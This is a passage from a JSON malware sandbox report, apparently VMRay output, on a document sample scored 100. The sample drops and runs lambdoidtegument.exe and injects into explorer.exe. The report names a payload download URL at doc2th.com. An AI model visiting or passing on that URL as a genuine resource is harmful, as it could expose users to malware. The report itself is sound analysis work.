"built_in._injection._modify_memory_system.vmray_modify_memory_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_system", "operation_desc": "Modify control flow of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", 
"rule_version": 1, "technique": "vmray_modify_control_flow_system", "technique_desc": "\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe\" alters context of \"c:\\windows\\explorer.exe\"", "technique_path": "built_in._injection._modify_control_flow_system.vmray_modify_control_flow_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"doc2th.com/tin/off.exe\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe\".", "technique_path": 
"built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }